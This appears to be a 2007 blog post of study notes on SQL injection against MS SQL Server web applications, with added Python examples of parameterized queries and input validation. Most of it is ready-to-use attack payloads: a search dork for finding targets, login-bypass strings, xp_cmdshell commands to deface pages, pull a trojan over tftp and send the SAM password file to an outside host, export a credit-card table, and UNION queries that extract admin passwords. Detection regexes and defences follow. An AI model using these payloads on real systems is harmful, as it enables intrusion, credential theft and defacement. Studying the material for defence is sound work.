sql injection

sql injection
it is a technique of injecting sql commands to exploit non-validated input
also called a "data hiding-code attack" (資料隱碼攻擊): the attacker embeds illegal sql commands in the input string, so the database mistakes them for legitimate sql commands and executes them


.........................................

steps for performing sql injection
1. first locate an input point
   ex: search google for login.asp site:com.tw
2. read the page source to decide whether to inject via get or post
3. test whether a vulnerability exists
   run a query according to the database in use
   ex: use a single quotation mark ( ' )
4. inject the illegal sql command

ps:
on microsoft platforms, if entering ( ' ) produces an OLE DB error, it indicates the website is vulnerable to an sql injection attack
.........................................

sql injection techniques:
authorization bypass:
using the select command: extract data
using the insert command: inject malicious data
using sql server stored procedures
ps: stored procedures are used when the backend database is ms sql server

authorization bypass:
the sql is as follows
select username from employee where username=value1 and password=value2
normal operation:
 username= ray
 password= ray
 generates the following sql
 select username from employee where username='ray' and password='ray'
attack operation:
 username= ray' or 1=1 --
 password= ray' or 1=1 --
 generates the following sql
 select username from employee where username='ray' or 1=1 -- ' and password='ray' or 1=1 --
 which is equivalent to
 select username from employee where username='ray' or 1=1
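The bypass above, rebuilt as an added example in Python (this is not code from the original notes): an in-memory SQLite database stands in for the notes' employee table, the vulnerable function concatenates the input into the query exactly as the generated sql above does, and the hardened function sends the same values as bound parameters. The table contents are constructed for the example; SQLite is used instead of MS SQL Server because it ships with Python, and its `--` comment syntax behaves the same way for this payload.

```python
import sqlite3

# Constructed sample data for this example: an in-memory SQLite database
# standing in for the notes' "employee" table (names and values are assumed).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employee (username TEXT, password TEXT)")
    conn.execute("INSERT INTO employee VALUES ('ray', 'ray'), ('alice', 's3cret')")
    return conn

def build_vulnerable_sql(username, password):
    # String concatenation: the input text becomes part of the SQL grammar,
    # so a quote closes the literal and "--" comments out the password check.
    return ("SELECT username FROM employee WHERE username='" + username +
            "' AND password='" + password + "'")

def login_vulnerable(conn, username, password):
    # Executes the concatenated statement and returns every username it matches.
    return [row[0] for row in conn.execute(build_vulnerable_sql(username, password))]

def login_parameterized(conn, username, password):
    # Same query with bound parameters: the driver sends the SQL text and the
    # data separately, so the payload is compared as a plain string and matches nothing.
    sql = "SELECT username FROM employee WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]

if __name__ == "__main__":
    db = make_db()
    payload = "ray' or 1=1 --"
    print(build_vulnerable_sql(payload, "x"))
    print("vulnerable:    ", login_vulnerable(db, payload, "x"))      # every row
    print("parameterized: ", login_parameterized(db, payload, "x"))  # no rows
```

With the payload as username, the concatenated query returns every row of the table (the password check is commented out), while the parameterized query returns no rows because the whole payload is compared as a username value.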

using the insert command
the sql is as follows
insert into tablename values (value1,value2,value3);
normal operation:
insert into tablename values ("data1","data2","data3");
attack behaviour:
insert into tablename values ("+(select top 1 fieldname from tablename) + ",'ray@ray.com',"222-222-2222");

...

test sql injection vulnerability
depending on how the source code is written, the corresponding probe strings are:
' or 1=1--
" or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a)

use a "single quote" in the input
taking blah' or 1=1 as an example, the procedure is roughly as follows
in a form:
login:blah' or 1=1--
password:blah' or 1=1--
in a url:
http://search/index.asp?id=blah' or 1=1--

...

executing operating system commands
use stored procedures such as master..xp_cmdshell
the syntax is as follows
blah' ; exec master..xp_cmdshell "insert os command"
ps: if the single quote does not work, a double quote can be used
ex:
ping a server
blah' ; exec master..xp_cmdshell "ping 10.1.2.3" --
list the directory files
blah' ; exec master..xp_cmdshell "dir c:\*.* /s > c:\directory.txt" --
create a file
blah' ; exec master..xp_cmdshell "echo hello > c:\hello.txt" --
defacing a web page
blah' ; exec master..xp_cmdshell "echo you-are-defaced > c:\inetpub\wwwroot\index.htm" --
execute non-gui applications
blah' ; exec master..xp_cmdshell "cmd.exe /c appname.exe" --
upload a trojan to the server
blah' ; exec master..xp_cmdshell "tftp -i 10.1.2.3 GET trojan.exe c:\trojan.exe" --
download a trojan to the server
blah' ; exec master..xp_cmdshell "tftp -i 10.1.2.1 PUT c:\winnt\repair\SAM SAM" --


.....

use sp_makewebtask to write a query into an html file
sp_makewebtask is a stored procedure included in SQL Server
it is used to obtain a webshell; its main function is to export the records of a database table to a file
the syntax is as follows:
blah' ; exec master..sp_makewebtask "webpage","sql command"
ex:
output the creditcard table to a web page
blah' ; exec master..sp_makewebtask "\\10.10.1.4\share\creditcard.html","select * from creditcard"

.....

getting data from the database using odbc error messages
use specially crafted sql queries to force MS SQL SERVER to reveal the needed data, such as table names and column names, in the error message it returns

using the UNION clause
the syntax is roughly as follows
http://web/page.asp?var=value "UNION subquery"
the system produces an error message that discloses information according to the UNION subquery
the operation is roughly as follows
http://www.web.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
when the user UNIONs this string value to the integer 10, sql server tries to convert the string (nvarchar) to an integer; since converting nvarchar to int is not possible, this produces an error, and the server displays the error
the system produces the following error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
this error message reveals that the first table name is table1


UNION subquery examples:

make the system reveal the second table name
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN('table1')--
if the system's error message contains ...the nvarchar value 'admin_name' to a column ..., the table name is admin_name

using like, the following makes the system reveal the first table name containing login
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME like '%25LOGIN%25'--
if the system's error message contains ...the nvarchar value 'admin_login' to a column..., the table name is admin_login

make the system reveal the first column of admin_login
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
if the system's error message contains ...the nvarchar value 'login_id' to a column ..., the column name is login_id

make the system reveal the second column of admin_login
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN('login_id')--
if the system's error message contains ...the nvarchar value 'login_name' to a column ..., the column name is login_name

make the system reveal the first value of login_name in the admin_login table
UNION SELECT TOP 1 login_name FROM admin_login --
if the system's error message contains ...the nvarchar value 'ray' to a column ..., the first login_name value is ray

make the system reveal the password in the admin_login table where login_name is ray
UNION SELECT TOP 1 password FROM admin_login where login_name='ray'--
if the system's error message contains ...the nvarchar value 'ixtr3n' to a column ..., ray's password is ixtr3n


ps:
INFORMATION_SCHEMA.TABLES: contains information about all tables in the server
.....

update/insert data into the database
the syntax is roughly as follows
http://web/page.asp?var=value;"update or insert sql query"
ex:
http://www.web.com/index.asp?id=10; UPDATE admin_login SET password='goodjob' WHERE login_name='ray' --
http://www.web.com/index.asp?id=10; INSERT INTO admin_login (login_id,login_name,password) VALUES(123,'ray','goodjob') --


.........................................

sql injection in oracle
the methods are as follows
UNIONS
SUBSELECTS
DDL(data definition language)
INSERTS,UPDATES,DELETES
anonymous PL/SQL block in procedures

.........................................

sql injection in mysql
it is not easy to perform sql injection, because multiple statements cannot be issued at once


.........................................

attacking sql servers
the methods are
SSRS
osql -L probe
sc.exe
port scanning
use of commercial alternatives

...

SSRS(sql server resolution service)
the service is responsible for sending a response packet containing the connection details of clients who send a specially formed request
the packet contains the details necessary to connect to the desired instance,including the tcp port
uses udp port 1434

SSRS buffer overflow vulnerabilities:
allow remote attackers to overwrite portions of the system's memory and execute arbitrary code

...

osql -L probe
a command-line utility provided by microsoft with sql server 2000
allows the user to issue queries to the server
use: list servers

...

sc.exe
the service controller command makes it possible to query servers to see if they are offering sql server services
use: sweeping for services, to check whether the remote host is running sql server

.........................................

automated tools for sql injection

tool
sqldict: dictionary attack tool for sql server
sqlexec: uses xp_cmdshell
sqlbf: sql server password auditing
sqlsmack: linux-based remote command execution
sql2.exe: exploit tool targeting early versions
sqlmap: fingerprints the database back-end, supports blind sql injection
sqlninja: exploit tool
sqlier: cracks passwords quickly
automagic sql injector: automated sql injection
absinthe: supports blind sql injection

........................................

blind sql injection
allows an unauthorized attacker to access a database server
uses small differences in the responses to gradually recover the wanted information

countermeasures
filter user input

.........................................

countermeasures

use regular expressions to filter special characters, including
the single quote ('), the double dash (--), and so on

RE for detection of sql meta characters:
/(%27)|(')|(--)|(%23)|(#)/ix

modified RE for detection of sql meta characters:
/((%3D)|(=))[^\n]*((%27)|(')|(--)|(%3B)|(;))/i
  ((%3D)|(=))[^\n]*  the = sign or its hex equivalent, followed by zero or more non-newline characters
  (%27)|(')|(--)|(%3B)|(;)  single quote, double dash, or semicolon (or their hex equivalents)
RE for a typical sql injection attack:
/\w*((%27)|('))((%6F)|o|(%4F))((%72)|r|(%52))/ix
  \w*  zero or more alphanumeric or underscore characters
  (%27)|(')  single quote or its hex equivalent
  ((%6F)|o|(%4F))((%72)|r|(%52))  the word "or" in any combination of upper case, lower case and hex equivalents
RE for detecting sql injection using the UNION keyword:
/((%27)|('))union/ix
RE for detecting sql injection attacks on an ms sql server:
/exec(\s|\+)+(s|x)p\w+/ix
  (\s|\+)+  one or more whitespace characters or their http-encoded equivalents
  (s|x)p  the letters 'sp' or 'xp' to identify stored or extended procedures
  \w+  one or more alphanumeric or underscore characters

....

preventing sql injection attacks:
minimize the privileges of database connections
disable verbose error messages
protect the system account "sa"
never trust user input
never use dynamic sql
never connect to a database using an admin-level account
do not store secrets in plain text
exceptions should divulge minimal information

...

audit source codes:
escape single quotes
input validation
reject known bad input
input bound checking
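The four audit items above as an added Python example (not code from the original notes): an integer bound check for a parameter like the notes' index.asp?id=10, an allowlist for usernames, a denylist of the tokens the notes' payloads rely on, and quote doubling for the "escape single quotes" item. The username character policy, the id bounds and the token list are assumptions made for the example.

```python
import re

# Allowlist for usernames; the policy (letters, digits, underscore, 1-32 chars) is an assumption.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

def validate_id(raw, lo=1, hi=2**31 - 1):
    """Input bound checking for a numeric parameter (the notes' index.asp?id=10).
    Returns an int, or None unless the value is a plain integer within [lo, hi].
    Anything appended after the digits, such as ' UNION SELECT ...', is rejected."""
    raw = raw.strip()
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        return None
    value = int(raw)
    return value if lo <= value <= hi else None

def validate_username(raw):
    """Allowlist validation: accept only the characters a username may contain."""
    return raw if USERNAME_RE.fullmatch(raw) else None

# Tokens the notes' payloads rely on; matched case-insensitively.
BAD_TOKENS = ("'", "--", ";", "/*", "xp_", "sp_", "union")

def reject_known_bad(raw):
    """Denylist check ('reject known bad input'): returns the first offending
    token, or None. A legitimate O'Reilly is flagged too, which is the usual
    cost of a denylist."""
    lowered = raw.lower()
    for token in BAD_TOKENS:
        if token in lowered:
            return token
    return None

def escape_single_quotes(raw):
    """'Escape single quotes' by doubling them, the way a quote is written inside
    a SQL string literal. This only protects quoted string contexts: a numeric
    context such as id=10 UNION ... contains no quote at all, which is why
    validate_id (or a bound parameter) is needed there."""
    return raw.replace("'", "''")

if __name__ == "__main__":
    print(validate_id("10"),
          validate_id("10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--"))
    print(validate_username("ray"), validate_username("ray' or 1=1 --"))
    print(reject_known_bad("blah' ; exec master..xp_cmdshell \"ping 10.1.2.3\" --"))
    print(escape_single_quotes("ray' or 1=1 --"))
```

The integer check is the one that matters most for the notes' UNION examples: every one of them rides on an id parameter that was never checked to be a number, and no amount of quote escaping helps there.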
.....

tool
sql block:sql injection blocking tool
acunetix web vulnerability scanner: supports xss


posted 2007-10-18 23:11:33, modified 0000-00-00 00:00:00
